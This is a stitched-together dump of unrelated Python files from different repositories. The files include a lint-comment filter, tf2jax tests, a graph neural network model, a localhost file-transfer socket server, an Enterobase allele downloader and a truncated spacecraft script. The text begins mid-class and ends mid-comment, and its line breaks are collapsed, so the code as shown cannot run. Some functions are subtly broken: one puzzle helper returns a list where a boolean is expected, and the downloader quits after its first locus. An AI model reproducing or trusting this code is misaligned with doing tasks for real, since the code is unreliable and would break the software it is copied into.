NOSA: """NOSA comment.""" def __init__(self, name: str, stop: int, start: int, errors: Errors): """Initialize NOSA.""" self.name = name self.start = start self.stop = stop self.errors = errors def __str__(self): """Build string.""" ret = f'{self.name}({self.start}->{self.stop})' if self.errors: ret += f': {self.errors}' return ret def __contains__(self, item: Message): """Check if message should be silenced.""" if (not isinstance(item.line, Less) and not self.start <= int(item.line) <= self.stop ): return False return item in self.errors # nosa(2): pylint[R0913] @classmethod def from_comment(cls, string: str, type_: bool, location: int, start: int, # nosa: pylint[W0613] stop: int, *, _nosa: str = 'nosa', ) -> Optional[NOSA]: """Build NOSA from string.""" if _nosa not in string: return None regex = '(' + _nosa + r')(?:\((\d*)(?:,(\d*))?\))?(?:: (.*))?' match = re.search(regex, string) if match is None: return None groups: List[Any] = list(match.groups()) if groups[1] == '' or groups[1] is None: groups[1] = stop if type_ else location else: groups[1] = location + int(groups[1]) if groups[2] == '' or groups[2] is None: groups[2] = location else: groups[2] = location - int(groups[2]) if groups[3] == '': groups[3] = None if groups[3]: groups[3] = Errors.from_string(groups[3]) return cls(*groups) def _filter_nosa(comments, _nosa='nosa'): """Filter all comments to ones that are nosa.""" for comment, type_, location, (start, stop) in comments: nosa = NOSA.from_comment( comment, type_, location, start, stop, _nosa=_nosa, ) if nosa is not None: yield nosa def remove_nosa(objects): """Remove errors in accordance to nosa.""" for path, group in itertools.groupby(objects, _get_path): nosas = list(_filter_nosa(_find_nosa(path))) unused = [True] * len(nosas) for item in group: unmuted = True for i, nosa in enumerate(nosas): if item in nosa: unused[i] = False unmuted = False if unmuted: yield item for nosa in itertools.compress(nosas, unused): logger.info(Format('Unused nosa: {0!s}', nosa)) <reponame>off99555/sktime # -*- coding: utf-8 -*- """Module exports: series type converters.""" __all__ = ["convert", "convert_to", "mtype"] from sktime.forecasting.base.convertIO._convertIO import convert, convert_to, mtype def check_nondecreasing(si): return all(int(si[i-1]) <= int(si[i]) for i in range(1,6)) def check_no_run_doubles(si): mp = [si[i-1] == si[i] for i in range(1,6)] # "matches previous" if not any(mp): return False #edges if mp[0] == 1 and mp[1] == 0: return True if mp[4] == 1 and mp[3] == 0: return True ok = [1 for i in range(1,4) if (mp[i] == 1 and mp[i-1] == 0 and mp[i+1] == 0)] return ok print(check_nondecreasing('123456'), 'true') print(check_nondecreasing('100001'), 'false') print("") print(check_no_run_doubles('111166'), 'true') print(check_no_run_doubles('123566'), 'true') print(check_no_run_doubles('113596'), 'true') print(check_no_run_doubles('113455'), 'true') print(check_no_run_doubles('112244'), 'true') print(check_no_run_doubles('111455'), 'false') print(check_no_run_doubles('125556'), 'false') print(check_no_run_doubles('123456'), 'false') count = 0 for i in range(307237, 769058): si = str(i) if check_nondecreasing(si) and check_no_run_doubles(si): count += 1 print(count)<filename>delira/data_loading/sampler/random.py from delira.data_loading.sampler.abstract import AbstractSampler import numpy as np class RandomSampler(AbstractSampler): """ A Generic Random Sampler """ def __init__(self, indices, replacement=False, num_samples=None): """ Parameters ---------- indices : list the indices containing the classes to sample from replacement : bool whether to sample with or without replacement num_samples : int the number of samples to provide. Must only be specified if :param:`replacement` is True; If not specified, it defaults to the number of samples present in :param:`indices` """ super().__init__(indices) if replacement and num_samples is None: num_samples = len(self._indices) self._replacement = replacement self._num_samples = num_samples def __iter__(self): """ Returns an iterator returning random samples Returns ------- Iterator an iterator returning random samples """ n = len(self._indices) if self._replacement: return iter(np.random.randint(n, size=self._num_samples).tolist()) possible_samples = np.arange(n) np.random.shuffle(possible_samples) return iter(possible_samples) def __len__(self): """ Defines the length of the sampler Returns ------- int the number of samples """ if self._replacement: return self._num_samples else: return super().__len__() class RandomSamplerNoReplacement(RandomSampler): """ A Random Sampler without replacement """ def __init__(self, indices): """ Parameters ---------- indices : list the indices containing the classes to sample from """ super().__init__(indices, False, None) class RandomSamplerWithReplacement(RandomSampler): """ A Random Sampler With Replacement """ def __init__(self, indices, num_samples=None): """ Parameters ---------- indices : list the indices containing the classes to sample from num_samples : int number of samples to provide, if not specified: defaults to the amount values given in :param:`indices` """ super().__init__(indices, True, num_samples) from threading import Thread from queue import Queue import socket import struct import os HOST = '127.0.0.1' PORT = 5005 PACKET_SIZE = 1024 SUCCESS = b'File Has Been Transferred' SAVEPATH = "server_data" def writeFile(payload, fileName): with open(file=fileName, mode="w+b") as dataFile: dataFile.write(payload) def checkSaveDir(): if not os.path.isdir(SAVEPATH): command = f"mkdir {SAVEPATH}" os.system(command) def pipeHandler(pipe): checkSaveDir() while True: while not pipe.empty(): message = pipe.get() print("\n\nA new payload has arrived ...") print("Client suggests naming of this file as:\n'{}'".format(message["name"])) fileName = input('\nEnter "ok" to use the suggested name\nOtherwise enter the name you wish to save the file as\n(leave blank to not save)\n') if fileName: if fileName == "ok": fileName = message["name"] print("Using client suggested name") else: print(f"Saving file as: {fileName}") print("\nSaving file ...") try: saveFile(fileName=fileName, payload=message["payload"]) print("File has been saved ... ") except Exception as e: print(f"Failed to save file\nError {e}") else: print("User has elected to not save this file...") print("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n") def saveFile(fileName, payload): filePath = os.path.join(SAVEPATH, fileName) with open(file=filePath, mode="w+b") as dataFile: dataFile.write(payload) def main(pipe): while True: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.bind((HOST, PORT)) sock.listen() conn, addr = sock.accept() count = 1 first = True payload = b'' with conn: print('Connected by', addr) while True: data = conn.recv(1024) if first: first = False numOfPackets = struct.unpack('I', data[0:4])[0] lengthOfName = struct.unpack('I', data[4:8])[0] name = data[8:8 + lengthOfName].decode("utf-8") data = data[8 + lengthOfName:] if not data: break count += 1 payload += data if count == numOfPackets: print("Entire contents of file have been received") conn.sendall(SUCCESS) break message = {"payload": payload, "name": name} pipe.put(message) if __name__ == '__main__': os.system("clear") pipe = Queue(maxsize=0) socketServer = Thread(target=main, args=(pipe,)) userInput = Thread(target=pipeHandler, args=(pipe,)) socketServer.start() userInput.start() # Copyright 2021 DeepMind Technologies Limited. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests tf2jax.""" from absl.testing import parameterized import chex import haiku as hk import jax import jax.numpy as jnp import numpy as np import sonnet as snt import tensorflow as tf from tf2jax._src import tf2jax import tree class ModelsTest(tf.test.TestCase, parameterized.TestCase): def _test_convert(self, tf_func, inputs): jax_func, jax_params = tf2jax.convert( tf.function(tf_func), np.zeros_like(inputs)) jax_func = self.variant(jax_func) jax_results, jax_params = jax_func(jax_params, inputs) tf_results, tf_params = tf_func(inputs) # Check outputs for tf_res, jax_res in zip( tree.flatten(tf_results), tree.flatten(jax_results)): self.assertAllClose(tf_res.numpy(), jax_res, atol=1e-4) # Check params (batchnorm stats changed). for tf_var in tree.flatten(tf_params): jax_var = jax_params[tf_var.name.split(":")[0]] self.assertAllClose(tf_var.numpy(), jax_var, atol=1e-5) @chex.variants(with_jit=True, without_jit=True) def test_mlp(self): np.random.seed(42) tf.random.set_seed(42) inputs = np.random.normal(size=(128, 16)).astype(np.float32) model = snt.nets.MLP((64, 10,)) def tf_func(x): outputs = model(x) return outputs, model.variables self._test_convert(tf_func, inputs) @chex.variants(with_jit=True, without_jit=True) @parameterized.named_parameters( chex.params_product( (("inference", False), ("training", True)), named=True, )) def test_resnet(self, training): np.random.seed(42) tf.random.set_seed(42) inputs = np.random.normal(size=(10, 128, 128, 3)).astype(np.float32) model = snt.nets.ResNet([1, 1, 1, 1], 10) def tf_func(x): outputs = model(x, is_training=training) return outputs, model.variables self._test_convert(tf_func, inputs) @chex.variants(with_jit=True, without_jit=True) @parameterized.named_parameters( chex.params_product( (("inference", False), ("training", True)), named=True, )) def test_vqvae(self, training): np.random.seed(42) tf.random.set_seed(42) inputs = np.random.normal(size=(10, 128, 128, 3)).astype(np.float32) model = snt.nets.VectorQuantizer(3, 100, 0.1) def tf_func(x): return model(x, is_training=training), model.variables self._test_convert(tf_func, inputs) class FeaturesTest(tf.test.TestCase, parameterized.TestCase): def _setup_saved_model(self, *inputs): def tf_func(x): return tf.exp(x) # Save. model = tf.Module() model.f = tf.function(tf_func) for inp in inputs: if isinstance(inp, tf.TensorSpec): model.f.get_concrete_function(inp) # Dummy call. else: model.f(np.zeros_like(inp)) # Dummy call. tmp_dir = self.create_tempdir() tf.saved_model.save(model, tmp_dir.full_path) return tf_func, tf.saved_model.load(tmp_dir.full_path) @chex.variants(with_jit=True, without_jit=True) def test_saved_model(self): dummy_inputs = np.zeros([10, 5], dtype=np.float32) tf_func, restored = self._setup_saved_model(dummy_inputs) # Convert to Jax (with and without explicit inputs). for inp in [(), (dummy_inputs,)]: if inp: jax_func, _ = tf2jax.convert(restored.f, *inp) else: jax_func, _ = tf2jax.convert_from_restored(restored.f) jax_func = self.variant(jax_func) test_inputs = np.ones([20, 5], dtype=np.float32) expected_outputs = tf_func(test_inputs) with tf2jax.override_config("strict_shape_check", False): actual_outputs, _ = jax_func({}, test_inputs) self.assertAllClose(expected_outputs, actual_outputs) @chex.variants(with_jit=True, without_jit=True) def test_saved_model_ambiguous(self): dummy_one = np.zeros([10, 5], dtype=np.float32) dummy_two = np.zeros([10, 5, 3], dtype=np.float32) tf_func, restored = self._setup_saved_model(dummy_one, dummy_two) with self.assertRaisesRegex(ValueError, "Found 2 concrete functions"): jax_func, _ = tf2jax.convert_from_restored(restored.f) jax_func, _ = tf2jax.convert(restored.f, dummy_two) jax_func = self.variant(jax_func) test_inputs = np.ones([20, 7, 2], dtype=np.float32) expected_outputs = tf_func(test_inputs) with tf2jax.override_config("strict_shape_check", False): actual_outputs, _ = jax_func({}, test_inputs) self.assertAllClose(expected_outputs, actual_outputs) @chex.variants(with_jit=True, without_jit=True) def test_saved_model_functional(self): dummy_inputs = np.zeros([10, 5], dtype=np.float32) tf_func, restored = self._setup_saved_model(dummy_inputs) jax_func = tf2jax.convert_functional_from_restored(restored.f) jax_func = self.variant(jax_func) test_inputs = np.ones([20, 5], dtype=np.float32) expected_outputs = tf_func(test_inputs) with tf2jax.override_config("strict_shape_check", False): actual_outputs = jax_func(test_inputs) self.assertAllClose(expected_outputs, actual_outputs) @chex.variants(with_jit=True, without_jit=True) def test_saved_model_polymorphic_shape(self): dummy_input_spec = tf.TensorSpec((None, None, 2), dtype=tf.float32) tf_func, restored = self._setup_saved_model(dummy_input_spec) jax_func = tf2jax.convert_functional_from_restored(restored.f) jax_func = self.variant(jax_func) test_inputs = np.ones([10, 5, 2], dtype=np.float32) expected_outputs = tf_func(test_inputs) actual_outputs = jax_func(test_inputs) self.assertAllClose(expected_outputs, actual_outputs) @chex.variants(with_jit=True, without_jit=True) def test_strict_check(self): def tf_func(x): return x.shape orig_inputs = np.zeros((10, 5), dtype=np.float32) model = tf.Module() model.f = tf.function(tf_func) model.f(orig_inputs) tmp_dir = self.create_tempdir() tf.saved_model.save(model, tmp_dir.full_path) restored = tf.saved_model.load(tmp_dir.full_path) jax_func = tf2jax.convert_functional_from_restored(restored.f) jax_func = self.variant(jax_func) with self.subTest("valid_input_shape"): expected_outputs = tf_func(orig_inputs) with tf2jax.override_config("strict_shape_check", True): actual_outputs = jax_func(orig_inputs) self.assertAllClose(expected_outputs, actual_outputs) with tf2jax.override_config("strict_dtype_check", True): actual_outputs = jax_func(orig_inputs) self.assertAllClose(expected_outputs, actual_outputs) test_inputs = np.ones([10, 5, 2], dtype=np.float32) with self.subTest("invalid_input_shape"): expected_outputs = tf_func(test_inputs) with tf2jax.override_config("strict_shape_check", True): with self.assertRaisesRegex(ValueError, "incompatible input shape"): actual_outputs = jax_func(test_inputs) with tf2jax.override_config("strict_shape_check", False): actual_outputs = jax_func(test_inputs) self.assertNotAllClose(expected_outputs, actual_outputs) test_inputs = np.ones([10, 5], dtype=np.int32) with self.subTest("invalid_input_dtype"): expected_outputs = tf_func(test_inputs) with tf2jax.override_config("strict_dtype_check", True): with self.assertRaisesRegex(ValueError, "incompatible input dtype"): actual_outputs = jax_func(test_inputs) with tf2jax.override_config("strict_dtype_check", False): actual_outputs = jax_func(test_inputs) self.assertAllClose(expected_outputs, actual_outputs) @chex.variants(with_jit=True, without_jit=True) @parameterized.named_parameters( chex.params_product( (("float32", tf.float32), ("float64", tf.float64)), named=True, )) def test_force_bf16_consts(self, tf_dtype): @tf.function def tf_func(x): return x + tf.constant(3.14, dtype=x.dtype) np_inputs = np.array(42.0, tf_dtype.as_numpy_dtype()) tf_outputs = tf_func(np_inputs) dtype_config_name = ("force_const_float32_to_bfloat16" if tf_dtype == tf.float32 else "force_const_float64_to_bfloat16") # This is the default. with tf2jax.override_config(dtype_config_name, False): jax_func = tf2jax.convert_functional(tf_func, np_inputs) jax_func = self.variant(jax_func) orig_jax_outputs = jax_func(np_inputs) self.assertEqual( jnp.array(np_inputs).dtype, jnp.array(orig_jax_outputs).dtype) self.assertAllClose(tf_outputs, orig_jax_outputs) with tf2jax.override_config(dtype_config_name, True): jax_func = tf2jax.convert_functional(tf_func, np_inputs) jax_func = self.variant(jax_func) forced_jax_outputs = jax_func(jnp.asarray(np_inputs, jnp.bfloat16)) self.assertEqual(jnp.bfloat16, forced_jax_outputs.dtype) self.assertAllClose(tf.cast(tf_outputs, tf.bfloat16), forced_jax_outputs) @chex.variants(with_jit=True, without_jit=True) def test_force_bf16_consts_for_leaks(self): @tf.function def tf_func(x): return x + tf.constant(3.14, dtype=tf.float32) np_inputs = np.array(42.0, np.float32) tf_outputs = tf_func(np_inputs) class CachedFn(hk.Module): cache = [] def __init__(self): super().__init__(name=None) if not self.cache: with tf2jax.override_config("force_const_float32_to_bfloat16", True): self.cache.append(jax.jit( tf2jax.convert_functional(tf_func, np_inputs))) def __call__(self, x): return self.cache[0](x) def call_cached_fn(x): return CachedFn()(x) cached_fn = hk.without_apply_rng(hk.transform(call_cached_fn)) params = self.variant(cached_fn.init)(jax.random.PRNGKey(42), np_inputs) jax_inputs = jnp.asarray(np_inputs, jnp.bfloat16) jax_outputs = self.variant(cached_fn.apply)(params, jax_inputs) self.assertEqual(jnp.bfloat16, jax_outputs.dtype) self.assertAllClose(tf.cast(tf_outputs, tf.bfloat16), jax_outputs) def test_static_argnums(self): @tf.function def tf_func(x): return tf.zeros((x,)) with self.subTest("literal_input"): jax_func = tf2jax.convert_functional(tf_func, 10) self.assertEqual(jax_func(10).shape, (10,)) with self.assertRaisesRegex(ValueError, "Found unexpected literal value"): jax_func(13) with self.assertRaisesRegex(ValueError, "Found unexpected tracer"): jax.jit(jax_func)(13) with self.assertRaisesRegex(ValueError, "Found unexpected literal value"): jax.jit(jax_func, static_argnums=0)(13) with self.subTest("array_input"): jax_func = tf2jax.convert_functional(tf_func, np.array(10)) self.assertEqual(jax_func(10).shape, (10,)) self.assertEqual(jax_func(13).shape, (13,)) with self.assertRaisesRegex( TypeError, "Shapes must be 1D sequences of concrete values of integer type"): jax.jit(jax_func)(13) self.assertEqual(jax.jit(jax_func, static_argnums=0)(13).shape, (13,)) @chex.variants(with_jit=True, without_jit=True) @parameterized.named_parameters( chex.params_product( (("with_custom_gradient", True), ("without_custom_gradient", False)), named=True, )) def test_custom_gradient(self, use_custom_gradient): @tf.function @tf.custom_gradient def tf_func(x): e = tf.exp(x) def grad(dy): # This is deliberately the wrong gradient. return dy * (1 - 1 / (1 + e)) * tf.sin(x) + 0.42 return tf.reduce_sum(tf.math.log(1 + e)), grad np_inputs = np.array(range(6), dtype=np.float32).reshape(3, 2) tf_inputs = tf.constant(np_inputs) with tf.GradientTape() as tape: tape.watch(tf_inputs) tf_outputs = tf_func(tf_inputs) tf_grads = tape.gradient(tf_outputs, tf_inputs) with tf2jax.override_config("convert_custom_gradient", use_custom_gradient): jax_func = tf2jax.convert_functional(tf_func, np.zeros_like(np_inputs)) jax_func = self.variant(jax_func) jax_outputs = jax_func(np_inputs) jax_grads = jax.grad(jax_func)(np_inputs) self.assertAllClose(tf_outputs, jax_outputs) if use_custom_gradient: self.assertAllClose(tf_grads, jax_grads) else: self.assertNotAllClose(tf_grads, jax_grads) @chex.variants(with_jit=True, without_jit=True) def test_trainable(self): can_train = tf.Variable(3.14, trainable=True, name="can_train") not_train = tf.Variable(42., trainable=False, name="not_train") @tf.function def tf_func(x): return x + can_train + not_train np_inputs = np.array(range(6), dtype=np.float32).reshape(3, 2) jax_func, jax_params = tf2jax.convert(tf_func, np.zeros_like(np_inputs)) self.assertTrue(jax_params["can_train"].trainable) self.assertFalse(jax_params["not_train"].trainable) tf_outputs = tf_func(tf.constant(np_inputs)) jax_outputs, _ = self.variant(jax_func)(jax_params, np_inputs) self.assertAllClose(tf_outputs, jax_outputs) @chex.variants(with_jit=True, without_jit=True) @parameterized.named_parameters( chex.params_product( ( ("positional", ((3.14, 42.0), {})), ("positional_and_keyword", ((3.14,), dict(y=42.0))), ("keyword", ((), dict(x=3.14, y=42.0))), ), named=True, )) def test_positional_and_keyword_args(self, all_args): @tf.function def tf_func(x, y): return x + y fn_args, fn_kwargs = tree.map_structure(np.array, all_args) tf_outputs = tf_func(*fn_args, **fn_kwargs) zero_args, zero_kwargs = tree.map_structure(np.zeros_like, all_args) jax_func = tf2jax.convert_functional(tf_func, *zero_args, **zero_kwargs) jax_outputs = self.variant(jax_func)(*fn_args, **fn_kwargs) self.assertAllClose(tf_outputs, jax_outputs) @chex.variants(with_jit=True, without_jit=True) @parameterized.named_parameters( chex.params_product( ( ("no_defaults", lambda *, kw0, kw1: kw0 + kw1), ("some_defaults", lambda *, kw0=3.14, kw1: kw0 + kw1), ("all_defaults", lambda *, kw0=3.14, kw1=42.0: kw0 + kw1), ("all_defaults_some_used", lambda *, kw0=3.14, kw1=42.0, kw2=2.8: kw0 + kw1 + kw2), ), named=True, )) def test_keyword_only(self, fn): tf_func = tf.function(fn) inputs = (np.array(3.5, dtype=np.float32), np.array(7.2, dtype=np.float32)) tf_outputs = tf_func(kw0=inputs[0], kw1=inputs[1]) jax_func = tf2jax.convert_functional( tf_func, kw0=np.zeros_like(inputs[0]), kw1=np.zeros_like(inputs[1])) jax_outputs = self.variant(jax_func)(kw0=inputs[0], kw1=inputs[1]) self.assertAllClose(tf_outputs, jax_outputs) if __name__ == "__main__": tf.test.main() <reponame>jingmouren/OpenHGNN import torch import torch.nn as nn import torch.nn.functional as F from . import BaseModel, register_model class GNN(nn.Module): """ Aggregate 2-hop neighbor. """ def __init__(self, input_dim, output_dim, num_neighbor, use_bias=True): super(GNN, self).__init__() self.input_dim = int(input_dim) self.num_fea = int(input_dim) self.output_dim = int(output_dim) self.num_neighbor = num_neighbor self.use_bias = use_bias self.linear1 = nn.Linear(self.input_dim * 2, 64) self.linear2 = nn.Linear(64+self.num_fea, 64) self.linear3 = nn.Linear(64, self.output_dim) def forward(self, fea): node = fea[:, :self.num_fea] neigh1 = fea[:, self.num_fea:self.num_fea * (self.num_neighbor + 1)] neigh1 = torch.reshape(neigh1, [-1, self.num_neighbor, self.num_fea]) neigh2 = fea[:, self.num_fea * (self.num_neighbor + 1):] neigh2 = torch.reshape(neigh2, [-1, self.num_neighbor, self.num_neighbor, self.num_fea]) neigh2_agg = torch.mean(neigh2, dim=2) tmp = torch.cat([neigh1, neigh2_agg], dim=2) tmp = F.relu(self.linear1(tmp)) emb = torch.cat([node, torch.mean(tmp, dim=1)], dim=1) emb = F.relu(self.linear2(emb)) emb = F.relu(self.linear3(emb)) return emb @register_model('HDE') class HDE(BaseModel): def __init__(self, input_dim, output_dim, num_neighbor, use_bias=True): super(HDE, self).__init__() self.input_dim = int(input_dim) self.output_dim = int(output_dim) self.num_neighbor = num_neighbor self.use_bias = use_bias self.aggregator = GNN(input_dim=input_dim, output_dim=output_dim, num_neighbor=num_neighbor) self.linear1 = nn.Linear(2*self.output_dim, 32) self.linear2 = nn.Linear(32, 2) def forward(self, fea_a, fea_b): emb_a = self.aggregator(fea_a) emb_b = self.aggregator(fea_b) emb = torch.cat([emb_a, emb_b], dim=1) emb = F.relu(self.linear1(emb)) output = self.linear2(emb) return output @classmethod def build_model_from_args(cls, args, hg): return cls(input_dim=args.input_dim, output_dim=args.output_dim, num_neighbor=args.num_neighbor, use_bias=args.use_bias) <gh_stars>100-1000 ''' This module contains utility methods that are used in various places across the sciluigi library ''' import csv import os import time from luigi.six import iteritems def timestamp(datefmt='%Y-%m-%d, %H:%M:%S'): ''' Create timestamp as a formatted string. ''' return time.strftime(datefmt, time.localtime()) def timepath(sep='_'): ''' Create timestmap, formatted for use in file names. ''' return timestamp('%Y%m%d{sep}%H%M%S'.format(sep=sep)) def timelog(): ''' Create time stamp for use in log files. ''' return timestamp('[%Y-%m-%d %H:%M:%S]') def ensuredir(dirpath): ''' Ensure directory exists. ''' if not os.path.exists(dirpath): os.makedirs(dirpath) RECORDFILE_DELIMITER = ':' def recordfile_to_dict(filehandle): ''' Convert a record file to a dictionary. ''' csvrd = csv.reader(filehandle, delimiter=RECORDFILE_DELIMITER, skipinitialspace=True) records = {} for row in csvrd: records[row[0]] = row[1] return records def dict_to_recordfile(filehandle, records): ''' Convert a dictionary to a recordfile. ''' csvwt = csv.writer(filehandle, delimiter=RECORDFILE_DELIMITER, skipinitialspace=True) rows = [] for key, val in iteritems(records): rows.append([key, val]) csvwt.writerows(rows) <gh_stars>0 from django.urls import path from .views import import_data urlpatterns = [ path('import/', import_data, name='import-data') ] from olctools.accessoryFunctions.accessoryFunctions import make_path, SetupLogging import olctools.databasesetup.settings try: from olctools.databasesetup.settings import ECOLI except (NameError, ImportError): ECOLI = str() try: from olctools.databasesetup.settings import SENTERICA except (NameError, ImportError): SENTERICA = str() try: from olctools.databasesetup.settings import YERSINIA except (NameError, ImportError): YERSINIA = str() from urllib3.exceptions import HTTPError from argparse import ArgumentParser from subprocess import call import logging import urllib3 import shutil import json import os class DownloadScheme(object): def main(self): self.download_profile() if self.name_file: self.read_names() self.download_alleles() def create_request(self, request_str): http = urllib3.PoolManager() headers = urllib3.util.make_headers(basic_auth='{token}:'.format(token=self.api_key)) request = http.request(method='GET', url=request_str, headers=headers, preload_content=False) return request def read_names(self): """ Read in all the names of the genes of interest """ logging.info('Reading names file') with open(self.name_file, 'r') as names: self.names = [name.rstrip() for name in names.readlines()] def download_profile(self): logging.info('Downloading {genus} {scheme} profile'.format(genus=self.genus, scheme=self.scheme)) if self.organism == 'senterica': profile_output = os.path.join(self.output_path, '{scheme}-profiles.list.gz'.format(scheme=self.scheme)) profile_list = os.path.join(self.output_path, '{scheme}-profiles.list'.format(scheme=self.scheme)) else: profile_output = os.path.join(self.output_path, '{scheme}-profiles.gz'.format(scheme=self.scheme)) profile_list = os.path.join(self.output_path, '{scheme}-profiles'.format(scheme=self.scheme)) profile_text = os.path.join(self.output_path, 'profile.txt') if not os.path.isfile(profile_output) and not os.path.isfile(profile_text): address = '{address}{org}/schemes?scheme_name={sn}&limit={limit}&only_fields=download_sts_link' \ .format(address=self.server_address, org=self.organism, sn=self.scheme, limit=400000) try: response = self.create_request(address) try: data = json.loads(response.data.decode('utf-8')) except json.decoder.JSONDecodeError: data = dict() print(response.data.decode('utf-8')) quit() logging.debug(json.dumps(data, sort_keys=True, indent=4, separators=(',', ': '))) response.release_conn() for scheme_record in data['Schemes']: profile_link = scheme_record.get('download_sts_link', None) if profile_link: logging.info('Downloading {genus} profiles from {profile_link} to: {profile}' .format(genus=self.genus, profile_link=profile_link, profile=profile_output)) profile_response = self.create_request(profile_link) with open(profile_output, 'wb') as output_profile: while True: profile_data = profile_response.read() if not profile_data: break output_profile.write(profile_data) except (KeyError, HTTPError) as Response_error: error_string = str() for key, value in vars(Response_error).items(): error_string += '{key}: {value}\n'.format(key=key, value=value) print('HTTPError: {error}'.format(error=error_string)) quit() if os.path.isfile(profile_output) and not os.path.isfile(profile_list) and not os.path.isfile(profile_text): logging.info('Decompressing {allele}'.format(allele=profile_output)) pigz_cmd = 'pigz -d -f {profile_output}'.format(profile_output=profile_output) call(pigz_cmd, shell=True) try: shutil.move(profile_list, profile_text) except (FileNotFoundError, FileExistsError): pass def download_alleles(self): logging.info('Downloading {genus} {scheme} alleles'.format(genus=self.genus, scheme=self.scheme)) address = '{address}{org}/{sn}/loci?&limit={limit}&scheme={sn}'.format(address=self.server_address, org=self.organism, sn=self.scheme, limit=400000) try: response = self.create_request(address) try: data = json.loads(response.data.decode('utf-8')) except json.decoder.JSONDecodeError: data = dict() print(response.data.decode('utf-8')) quit() logging.debug(json.dumps(data, sort_keys=True, indent=4, separators=(',', ': '))) response.release_conn() for locus_record in data['loci']: locus_link = locus_record['download_alleles_link'] locus_file_name = locus_link.split('/')[-1] print(locus_file_name) quit() locus_output = os.path.join(self.output_path, locus_file_name) locus_file = os.path.splitext(locus_output)[0] locus_tfa = locus_file.replace('.fasta', '.tfa') if locus_link: if not os.path.isfile(locus_output) and not os.path.isfile(locus_file) \ and not os.path.isfile(locus_tfa): logging.info('Downloading {scheme} allele {allele}'.format(scheme=self.scheme, allele=locus_file)) locus_reponse = self.create_request(locus_link) with open(locus_output, 'wb') as output_locus: while True: locus_data = locus_reponse.read() if not locus_data: break output_locus.write(locus_data) if os.path.isfile(locus_output) and not os.path.isfile(locus_file): logging.info('Decompressing {allele}'.format(allele=locus_file)) pigz_cmd = 'pigz -d {gz_file}'.format(gz_file=locus_output) call(pigz_cmd, shell=True) if os.path.isfile(locus_file) and not os.path.isfile(locus_tfa): shutil.move(locus_file, locus_tfa) except (KeyError, HTTPError) as Response_error: error_string = str() for key, value in vars(Response_error).items(): error_string += '{key}: {value}\n'.format(key=key, value=value) print('HTTPError: {error}'.format(error=error_string)) quit() def __init__(self, databasepath, organism, scheme, genes=None): self.server_address = 'http://enterobase.warwick.ac.uk/api/v2.0/' self.organism = organism self.scheme = scheme if databasepath.startswith('~'): self.databasepath = os.path.expanduser(os.path.abspath(os.path.join(databasepath))) else: self.databasepath = os.path.abspath(os.path.join(databasepath)) genus_dict = { 'ecoli': 'Escherichia', 'senterica': 'Salmonella', 'yersinia': 'Yersinia' } self.genus = genus_dict[self.organism] self.output_path = os.path.join(self.databasepath, self.scheme.split('_')[0], self.genus) make_path(self.output_path) if genes.startswith('~'): self.name_file = os.path.abspath(os.path.expanduser(os.path.join(genes))) else: self.name_file = os.path.abspath(os.path.join(genes)) self.names = list() assert os.path.isfile(self.name_file), f'Cannot find the supplied file with gene names: {self.name_file}' if self.organism == 'ecoli': self.api_key = ECOLI if not self.api_key: # Use the user input to set the verifier code self.api_key = input('Enter API token from http://enterobase.warwick.ac.uk/species/index/ecoli ') try: with open(olctools.databasesetup.settings.__file__, 'a+') as env: env.write("ECOLI = '{api}'\n".format(api=self.api_key)) except: raise elif self.organism == 'senterica': self.api_key = SENTERICA if not self.api_key: # Use the user input to set the verifier code self.api_key = input('Enter API token from http://enterobase.warwick.ac.uk/species/index/senterica ') try: with open(olctools.databasesetup.settings.__file__, 'a+') as env: env.write("SENTERICA = '{api}'\n".format(api=self.api_key)) except: raise else: self.api_key = YERSINIA if not self.api_key: # Use the user input to set the verifier code self.api_key = input('Enter API token from http://enterobase.warwick.ac.uk/species/index/yersinia ') try: with open(olctools.databasesetup.settings.__file__, 'a+') as env: env.write("YERSINIA = '{api}'\n".format(api=self.api_key)) except: raise def cli(): # Parser for arguments parser = ArgumentParser(description='Download typing schemes and alleles from Enterobase') parser.add_argument('-d', '--databasepath', required=True, help='The path to the folder in which the typing scheme is to be installed. The program will ' 'create sub-folders as necessary. So, if you specify ' '/mnt/nas2/databases/assemblydatabases/0.5.0.0, that will be used as the root for the ' 'SCHEME/ORGANISM subfolder, e.g. cgMLST/Escherichia') parser.add_argument('-o', '--organism', required=True, choices=['ecoli', 'senterica', 'yersinia']) parser.add_argument('-s', '--scheme', required=True, choices=['MLST_Achtman', 'cgMLST', 'wgMLST']) parser.add_argument('-g', '--genes', help='Name and path to a file containing the gene names (one per line) to be extracted ' 'from the profile') parser.add_argument('-v', '--verbose', action='store_true', help='Print debug level messages') # Get the arguments into an object arguments = parser.parse_args() # Setup logging SetupLogging(debug=arguments.verbose) download = DownloadScheme(databasepath=arguments.databasepath, organism=arguments.organism, scheme=arguments.scheme, genes=arguments.genes) download.download_profile() download.download_alleles() # If the script is called from the command line, then call the argument parser if __name__ == '__main__': cli() <reponame>ckamtsikis/cmssw from RecoTracker.FinalTrackSelectors.trackAlgoPriorityOrder_cfi import trackAlgoPriorityOrder import RecoTracker.FinalTrackSelectors.simpleTrackListMerger_cfi hiGeneralAndRegitTracks = RecoTracker.FinalTrackSelectors.simpleTrackListMerger_cfi.simpleTrackListMerger.clone( TrackProducer1 = 'hiGeneralTracks', TrackProducer2 = 'hiRegitTracks', promoteTrackQuality = True, copyExtras=True ) """ This script loads in a trained policy neural network and uses it for inference. Typically this script will be executed on the Nvidia Jetson TX2 board during an experiment in the Spacecraft Robotics and Control Laboratory at Carleton University. Script created: June 12, 2019 @author: Kirk (<EMAIL>) """ import tensorflow as tf import numpy as np import socket import time import threading from collections import deque # import code # for debugging #code.interact(local=dict(globals(), **locals())) # Ctrl+D or Ctrl+Z to continue execution try: from settings import Settings except: print("You must load the 'manipulator' environment in settings\n\nQuitting.") raise SystemExit from build_neural_networks import BuildActorNetwork assert Settings.ENVIRONMENT == 'manipulator' # Load an environment to use methods from environment_file = __import__('environment_' + Settings.ENVIRONMENT) # importing the environment """ *# Relative pose expressed in the chaser's body frame; everything else in Inertial frame #* Deep guidance output in x and y are in the chaser body frame """ # Are we 